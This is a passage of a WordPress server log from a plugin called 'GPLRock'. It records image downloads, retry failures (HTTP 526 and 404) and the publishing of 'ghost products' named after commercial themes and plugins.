with image - Product ID: chauni-roofing-elementor-template-kit [05-Apr-2026 18:59:21 UTC] GPLRock: Image downloaded successfully for product jettricks-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62cd977f.jpg [05-Apr-2026 18:59:21 UTC] GPLRock: Using pre-downloaded image for product jettricks-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62cd977f.jpg [05-Apr-2026 18:59:21 UTC] GPLRock: Ghost product published with image - Product ID: jettricks-for-elementor [05-Apr-2026 18:59:23 UTC] GPLRock: Image downloaded successfully for product jetblocks-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42ffcf46.jpg [05-Apr-2026 18:59:23 UTC] GPLRock: Using pre-downloaded image for product jetblocks-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42ffcf46.jpg [05-Apr-2026 18:59:23 UTC] GPLRock: Ghost product published with image - Product ID: jetblocks-for-elementor [05-Apr-2026 18:59:24 UTC] GPLRock: Image downloaded successfully for product gravity-forms-slack-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-acc30057.jpg [05-Apr-2026 18:59:25 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-slack-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-acc30057.jpg [05-Apr-2026 18:59:25 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-slack-addon [05-Apr-2026 18:59:26 UTC] GPLRock: Image downloaded successfully for product eventon-event-tickets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84e32995.jpg [05-Apr-2026 18:59:26 UTC] GPLRock: Using pre-downloaded image for product eventon-event-tickets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84e32995.jpg [05-Apr-2026 18:59:26 UTC] GPLRock: Ghost product published with image - Product ID: eventon-event-tickets [05-Apr-2026 18:59:28 UTC] GPLRock: Image downloaded successfully for product total-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa073287.jpg [05-Apr-2026 18:59:28 UTC] GPLRock: Using pre-downloaded image for product total-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa073287.jpg [05-Apr-2026 18:59:28 UTC] GPLRock: Ghost product published with image - Product ID: total-responsive-multi-purpose-wordpress-theme [05-Apr-2026 18:59:30 UTC] GPLRock: Image downloaded successfully for product themify-landing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ce7c33a.jpg [05-Apr-2026 18:59:30 UTC] GPLRock: Using pre-downloaded image for product themify-landing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ce7c33a.jpg [05-Apr-2026 18:59:30 UTC] GPLRock: Ghost product published with image - Product ID: themify-landing-wordpress-theme [05-Apr-2026 18:59:32 UTC] GPLRock: Image downloaded successfully for product themify-infinite-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b96b65ba.jpg [05-Apr-2026 18:59:35 UTC] GPLRock: Using pre-downloaded image for product themify-infinite-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b96b65ba.jpg [05-Apr-2026 18:59:35 UTC] GPLRock: Ghost product published with image - Product ID: themify-infinite-wordpress-theme [05-Apr-2026 18:59:37 UTC] GPLRock: Image downloaded successfully for product themify-grido-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-845c5397.jpg [05-Apr-2026 18:59:37 UTC] GPLRock: Using pre-downloaded image for product themify-grido-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-845c5397.jpg [05-Apr-2026 18:59:37 UTC] GPLRock: Ghost product published with image - Product ID: themify-grido-wordpress-theme [05-Apr-2026 18:59:39 UTC] GPLRock: Image downloaded successfully for product themify-funki-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-34ff26f0.jpg [05-Apr-2026 18:59:39 UTC] GPLRock: Using pre-downloaded image for product themify-funki-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-34ff26f0.jpg [05-Apr-2026 18:59:39 UTC] GPLRock: Ghost product published with image - Product ID: themify-funki-wordpress-theme [05-Apr-2026 18:59:41 UTC] GPLRock: Image downloaded successfully for product themify-fullscreen-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6ac63f3.jpg [05-Apr-2026 18:59:41 UTC] GPLRock: Using pre-downloaded image for product themify-fullscreen-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6ac63f3.jpg [05-Apr-2026 18:59:41 UTC] GPLRock: Ghost product published with image - Product ID: themify-fullscreen-wordpress-theme [05-Apr-2026 19:00:34 UTC] GPLRock: Image download failed for product sku-shortlink-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:36 UTC] GPLRock: Image download failed for product sku-shortlink-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sku-shortlink-for-woocommerce-4492.webp for product sku-shortlink-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:00:38 UTC] GPLRock: Image download failed for product sku-shortlink-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:40 UTC] GPLRock: Image download failed for product sku-shortlink-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sku-shortlink-for-woocommerce-4492.webp for product sku-shortlink-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:00:43 UTC] GPLRock WARNING: Image download failed for product sku-shortlink-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/sku-shortlink-for-woocommerce-4492.webp [05-Apr-2026 19:00:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sku-shortlink-for-woocommerce [05-Apr-2026 19:00:43 UTC] GPLRock: Image download failed for product bookly-authorizenet-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:45 UTC] GPLRock: Image download failed for product bookly-authorizenet-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-authorizenet-add-on-25504.webp for product bookly-authorizenet-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:00:47 UTC] GPLRock: Image download failed for product bookly-authorizenet-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:49 UTC] GPLRock: Image download failed for product bookly-authorizenet-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-authorizenet-add-on-25504.webp for product bookly-authorizenet-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:00:51 UTC] GPLRock WARNING: Image download failed for product bookly-authorizenet-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-authorizenet-add-on-25504.webp [05-Apr-2026 19:00:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-authorizenet-add-on [05-Apr-2026 19:00:52 UTC] GPLRock: Image download failed for product quick-order-preview-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:54 UTC] GPLRock: Image download failed for product quick-order-preview-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:00:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-order-preview-for-woocommerce-6358.webp for product quick-order-preview-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:00:57 UTC] GPLRock: Image download failed for product quick-order-preview-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:00 UTC] GPLRock: Image download failed for product quick-order-preview-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-order-preview-for-woocommerce-6358.webp for product quick-order-preview-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:02 UTC] GPLRock WARNING: Image download failed for product quick-order-preview-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/quick-order-preview-for-woocommerce-6358.webp [05-Apr-2026 19:01:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quick-order-preview-for-woocommerce [05-Apr-2026 19:01:04 UTC] GPLRock: Image download failed for product word-search-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:06 UTC] GPLRock: Image download failed for product word-search-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/word-search-game-9597.webp for product word-search-game after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:09 UTC] GPLRock: Image download failed for product word-search-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:11 UTC] GPLRock: Image download failed for product word-search-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/word-search-game-9597.webp for product word-search-game after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:13 UTC] GPLRock WARNING: Image download failed for product word-search-game. URL: https://meldwp.com/wp-content/uploads/word-search-game-9597.webp [05-Apr-2026 19:01:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: word-search-game [05-Apr-2026 19:01:14 UTC] GPLRock: Image download failed for product contact-form-7-email-verification-view-export-form-entries (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:16 UTC] GPLRock: Image download failed for product contact-form-7-email-verification-view-export-form-entries (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-email-verification---view--export-form-entries-30269.webp for product contact-form-7-email-verification-view-export-form-entries after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:18 UTC] GPLRock: Image download failed for product contact-form-7-email-verification-view-export-form-entries (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:20 UTC] GPLRock: Image download failed for product contact-form-7-email-verification-view-export-form-entries (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-email-verification---view--export-form-entries-30269.webp for product contact-form-7-email-verification-view-export-form-entries after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:22 UTC] GPLRock WARNING: Image download failed for product contact-form-7-email-verification-view-export-form-entries. URL: https://meldwp.com/wp-content/uploads/contact-form-7-email-verification---view--export-form-entries-30269.webp [05-Apr-2026 19:01:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-form-7-email-verification-view-export-form-entries [05-Apr-2026 19:01:23 UTC] GPLRock: Image download failed for product juspay-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:25 UTC] GPLRock: Image download failed for product juspay-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/juspay-payment-gateway-woocommerce-plugin-10675.webp for product juspay-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:27 UTC] GPLRock: Image download failed for product juspay-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:29 UTC] GPLRock: Image download failed for product juspay-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/juspay-payment-gateway-woocommerce-plugin-10675.webp for product juspay-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:31 UTC] GPLRock WARNING: Image download failed for product juspay-payment-gateway-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/juspay-payment-gateway-woocommerce-plugin-10675.webp [05-Apr-2026 19:01:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: juspay-payment-gateway-woocommerce-plugin [05-Apr-2026 19:01:31 UTC] GPLRock: Image download failed for product voice-messages-form-for-wordpress-contacter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:33 UTC] GPLRock: Image download failed for product voice-messages-form-for-wordpress-contacter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voice-messages-form-for-wordpress--contacter-13718.webp for product voice-messages-form-for-wordpress-contacter after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:36 UTC] GPLRock: Image download failed for product voice-messages-form-for-wordpress-contacter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:38 UTC] GPLRock: Image download failed for product voice-messages-form-for-wordpress-contacter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voice-messages-form-for-wordpress--contacter-13718.webp for product voice-messages-form-for-wordpress-contacter after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:40 UTC] GPLRock WARNING: Image download failed for product voice-messages-form-for-wordpress-contacter. URL: https://meldwp.com/wp-content/uploads/voice-messages-form-for-wordpress--contacter-13718.webp [05-Apr-2026 19:01:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voice-messages-form-for-wordpress-contacter [05-Apr-2026 19:01:40 UTC] GPLRock: Image download failed for product dhvc-form-wordpress-form-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:42 UTC] GPLRock: Image download failed for product dhvc-form-wordpress-form-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dhvc-form---wordpress-form-for-wpbakery-page-builder-6014.webp for product dhvc-form-wordpress-form-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:44 UTC] GPLRock: Image download failed for product dhvc-form-wordpress-form-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:46 UTC] GPLRock: Image download failed for product dhvc-form-wordpress-form-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dhvc-form---wordpress-form-for-wpbakery-page-builder-6014.webp for product dhvc-form-wordpress-form-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:49 UTC] GPLRock WARNING: Image download failed for product dhvc-form-wordpress-form-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/dhvc-form---wordpress-form-for-wpbakery-page-builder-6014.webp [05-Apr-2026 19:01:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dhvc-form-wordpress-form-for-wpbakery-page-builder [05-Apr-2026 19:01:49 UTC] GPLRock: Image download failed for product visual-composer-gallery-and-album-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:51 UTC] GPLRock: Image download failed for product visual-composer-gallery-and-album-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---gallery-and-album-bundle-7494.webp for product visual-composer-gallery-and-album-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:53 UTC] GPLRock: Image download failed for product visual-composer-gallery-and-album-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:55 UTC] GPLRock: Image download failed for product visual-composer-gallery-and-album-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:01:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---gallery-and-album-bundle-7494.webp for product visual-composer-gallery-and-album-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:01:57 UTC] GPLRock WARNING: Image download failed for product visual-composer-gallery-and-album-bundle. URL: https://meldwp.com/wp-content/uploads/visual-composer---gallery-and-album-bundle-7494.webp [05-Apr-2026 19:01:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-gallery-and-album-bundle [05-Apr-2026 19:01:58 UTC] GPLRock: Image download failed for product make-me-halloween-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:02:00 UTC] GPLRock: Image download failed for product make-me-halloween-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:02:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/make-me-halloween---wordpress-plugin-2378.webp for product make-me-halloween-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:02:02 UTC] GPLRock: Image download failed for product make-me-halloween-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:02:04 UTC] GPLRock: Image download failed for product make-me-halloween-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:02:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/make-me-halloween---wordpress-plugin-2378.webp for product make-me-halloween-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:02:06 UTC] GPLRock WARNING: Image download failed for product make-me-halloween-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/make-me-halloween---wordpress-plugin-2378.webp [05-Apr-2026 19:02:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: make-me-halloween-wordpress-plugin [05-Apr-2026 19:04:57 UTC] GPLRock: Image downloaded successfully for product css-igniter-businesstwo-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ab92865.jpg [05-Apr-2026 19:04:58 UTC] GPLRock: Using pre-downloaded image for product css-igniter-businesstwo-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ab92865.jpg [05-Apr-2026 19:04:58 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-businesstwo-wordpress-theme [05-Apr-2026 19:04:59 UTC] GPLRock: Image downloaded successfully for product memberpress-active-campaign (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-606a41e4.jpg [05-Apr-2026 19:04:59 UTC] GPLRock: Using pre-downloaded image for product memberpress-active-campaign: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-606a41e4.jpg [05-Apr-2026 19:04:59 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-active-campaign [05-Apr-2026 19:05:01 UTC] GPLRock: Image downloaded successfully for product give-aweber (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d53ee6b.jpg [05-Apr-2026 19:05:01 UTC] GPLRock: Using pre-downloaded image for product give-aweber: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d53ee6b.jpg [05-Apr-2026 19:05:01 UTC] GPLRock: Ghost product published with image - Product ID: give-aweber [05-Apr-2026 19:05:02 UTC] GPLRock: Image downloaded successfully for product give-iats-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4bc65259.jpg [05-Apr-2026 19:05:03 UTC] GPLRock: Using pre-downloaded image for product give-iats-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4bc65259.jpg [05-Apr-2026 19:05:03 UTC] GPLRock: Ghost product published with image - Product ID: give-iats-gateway [05-Apr-2026 19:05:04 UTC] GPLRock: Image downloaded successfully for product ninja-forms-save-progress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ac297fa.jpg [05-Apr-2026 19:05:05 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-save-progress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ac297fa.jpg [05-Apr-2026 19:05:05 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-save-progress [05-Apr-2026 19:05:06 UTC] GPLRock: Image downloaded successfully for product memberpress-drip-tags-version (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ed3db8a.jpg [05-Apr-2026 19:05:06 UTC] GPLRock: Using pre-downloaded image for product memberpress-drip-tags-version: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ed3db8a.jpg [05-Apr-2026 19:05:06 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-drip-tags-version [05-Apr-2026 19:05:08 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-save-for-later-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87e3175d.jpg [05-Apr-2026 19:05:08 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-save-for-later-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87e3175d.jpg [05-Apr-2026 19:05:08 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-save-for-later-premium [05-Apr-2026 19:05:09 UTC] GPLRock: Image downloaded successfully for product popup-maker-aweber-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60409165.jpg [05-Apr-2026 19:05:09 UTC] GPLRock: Using pre-downloaded image for product popup-maker-aweber-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60409165.jpg [05-Apr-2026 19:05:09 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-aweber-integration [05-Apr-2026 19:05:11 UTC] GPLRock: Image downloaded successfully for product socialchef-social-recipe-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f943f576.jpg [05-Apr-2026 19:05:11 UTC] GPLRock: Using pre-downloaded image for product socialchef-social-recipe-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f943f576.jpg [05-Apr-2026 19:05:11 UTC] GPLRock: Ghost product published with image - Product ID: socialchef-social-recipe-wordpress-theme [05-Apr-2026 19:05:13 UTC] GPLRock: Image downloaded successfully for product woocommerce-alipay-cross-border-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a4858430.jpg [05-Apr-2026 19:05:13 UTC] GPLRock: Using pre-downloaded image for product woocommerce-alipay-cross-border-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a4858430.jpg [05-Apr-2026 19:05:13 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-alipay-cross-border-payment-gateway [05-Apr-2026 19:06:41 UTC] GPLRock: Image downloaded successfully for product premium-addons-pro-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63e2f3bb.jpg [05-Apr-2026 19:06:41 UTC] GPLRock: Using pre-downloaded image for product premium-addons-pro-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63e2f3bb.jpg [05-Apr-2026 19:06:41 UTC] GPLRock: Ghost product published with image - Product ID: premium-addons-pro-for-elementor [05-Apr-2026 19:06:42 UTC] GPLRock: Image downloaded successfully for product wp-staging-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d50a303.jpg [05-Apr-2026 19:06:43 UTC] GPLRock: Using pre-downloaded image for product wp-staging-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d50a303.jpg [05-Apr-2026 19:06:43 UTC] GPLRock: Ghost product published with image - Product ID: wp-staging-pro [05-Apr-2026 19:06:44 UTC] GPLRock: Image downloaded successfully for product social-auto-poster (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2658b5a1.jpg [05-Apr-2026 19:06:44 UTC] GPLRock: Using pre-downloaded image for product social-auto-poster: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2658b5a1.jpg [05-Apr-2026 19:06:44 UTC] GPLRock: Ghost product published with image - Product ID: social-auto-poster [05-Apr-2026 19:06:46 UTC] GPLRock: Image downloaded successfully for product pixwell-modern-magazine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1244343a.jpg [05-Apr-2026 19:06:46 UTC] GPLRock: Using pre-downloaded image for product pixwell-modern-magazine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1244343a.jpg [05-Apr-2026 19:06:46 UTC] GPLRock: Ghost product published with image - Product ID: pixwell-modern-magazine [05-Apr-2026 19:06:48 UTC] GPLRock: Image downloaded successfully for product woocommerce-upload-files (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35bc45d7.jpg [05-Apr-2026 19:06:48 UTC] GPLRock: Using pre-downloaded image for product woocommerce-upload-files: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35bc45d7.jpg [05-Apr-2026 19:06:48 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-upload-files [05-Apr-2026 19:06:50 UTC] GPLRock: Image downloaded successfully for product residence-real-estate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d471ea50.jpg [05-Apr-2026 19:06:50 UTC] GPLRock: Using pre-downloaded image for product residence-real-estate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d471ea50.jpg [05-Apr-2026 19:06:50 UTC] GPLRock: Ghost product published with image - Product ID: residence-real-estate-wordpress-theme [05-Apr-2026 19:06:52 UTC] GPLRock: Image downloaded successfully for product mythemeshop-coupon-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5658219.jpg [05-Apr-2026 19:06:52 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-coupon-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5658219.jpg [05-Apr-2026 19:06:52 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-coupon-wordpress-theme [05-Apr-2026 19:06:54 UTC] GPLRock: Image downloaded successfully for product wp-project-manager-pro-business (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98150ee3.jpg [05-Apr-2026 19:06:54 UTC] GPLRock: Using pre-downloaded image for product wp-project-manager-pro-business: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98150ee3.jpg [05-Apr-2026 19:06:54 UTC] GPLRock: Ghost product published with image - Product ID: wp-project-manager-pro-business [05-Apr-2026 19:06:58 UTC] GPLRock: Image download failed for product lms-learning-management-system-education-lms-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:07:02 UTC] GPLRock: Image download failed for product lms-learning-management-system-education-lms-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 19:07:06 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/LMS-Learning-Management-System-Education-LMS-WordPress-Theme.jpg for product lms-learning-management-system-education-lms-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 19:07:08 UTC] GPLRock: Image download failed for product 